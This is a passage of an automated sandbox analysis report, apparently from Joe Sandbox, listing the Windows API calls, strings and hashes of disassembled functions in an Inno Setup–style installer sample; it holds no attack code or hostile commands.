                                                                                            • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                            • API String ID: 667068680-222143506
                                                                                            • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                            • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B57E
                                                                                            • GetDC.USER32(?), ref: 0041B58A
                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2502006586-0
                                                                                            • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                            • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                            • API String ID: 1452528299-1580325520
                                                                                            • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                            • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                            • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                            • String ID:
                                                                                            • API String ID: 447804332-0
                                                                                            • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                            • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$Show
                                                                                            • String ID:
                                                                                            • API String ID: 3609083571-0
                                                                                            • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                            • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                            APIs
                                                                                              • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                            • String ID:
                                                                                            • API String ID: 3527656728-0
                                                                                            • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                            • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
APIs
• MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
• GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
• CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
• InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
APIs
• BeginPaint.USER32(00000000,?), ref: 00416C52
• SaveDC.GDI32(?), ref: 00416C83
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
• RestoreDC.GDI32(?,?), ref: 00416D0B
• EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
Similarity
• API ID: Paint$BeginClipExcludeRectRestoreSave
• String ID:
• API String ID: 3808407030-0
APIs
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
• GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
• GetDC.USER32(00000000), ref: 0041BC12
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
• DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                            • String ID:
                                                                                            • API String ID: 1095203571-0
                                                                                            • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                            • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
APIs
  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
Strings
• Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
• Setting permissions on registry key: %s\%s, xrefs: 0047362A
• Failed to set permissions on registry key (%d)., xrefs: 0047368C
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
• Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
• Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
• Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
APIs
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
• RealizePalette.GDI32(00000000), ref: 00414421
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
• RealizePalette.GDI32(00000000), ref: 0041443B
• ReleaseDC.USER32(00000000,00000000), ref: 00414446
Similarity
• API ID: Palette$RealizeSelect$Release
• String ID:
• API String ID: 2261976640-0
• Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
• Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
APIs
  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
• OffsetRect.USER32(?,?,?), ref: 00424DC9
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
• OffsetRect.USER32(?,?,?), ref: 00424E9D
  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
Strings
Similarity
• API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
• String ID: vLB
• API String ID: 1477829881-1797516613
• Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
• Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
• Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
• Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
Strings
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
• Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
• Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
APIs
• SetRectEmpty.USER32(?), ref: 0044D04E
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
Strings
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
• Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
• Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
APIs
• GetDC.USER32(00000000), ref: 0042EF9E
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(?,00000000), ref: 0042EFC1
• ReleaseDC.USER32(00000000,?), ref: 0042F0A0
Strings
Similarity
• API ID: CreateFontIndirectObjectReleaseSelect
• String ID: ...\
• API String ID: 3133960002-983595016
• Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
• Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
• UnregisterClassA.USER32(?,00400000), ref: 004164AB
• RegisterClassA.USER32(?), ref: 004164CE
Strings
                                                                                            Similarity
                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                            • String ID: @
                                                                                            • API String ID: 3749476976-2766056989
APIs
• GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
Strings
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
Strings
Similarity
• API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
• String ID: LoadTypeLib$RegisterTypeLib
• API String ID: 1312246647-2435364021
APIs
• SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
• SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
Strings
• Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
• Failed to create DebugClientWnd, xrefs: 004571D4
Similarity
• API ID: MessageSend
• String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
• API String ID: 3850602802-3720027226
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetFocus.USER32 ref: 00478757
• GetKeyState.USER32(0000007A), ref: 00478769
• WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
Strings
Similarity
• API ID: FocusMessageStateTextWaitWindow
• String ID: Wnd=$%x
• API String ID: 1381870634-2927251529
APIs
• FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
Strings
Similarity
• API ID: Time$File$LocalSystem
• String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
• API String ID: 1748579591-1013271723
APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: DeleteFile$MoveFile
• API String ID: 3024442154-139070271
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
Strings
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
• CSDVersion, xrefs: 00483BFC
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 3677997916-1910633163
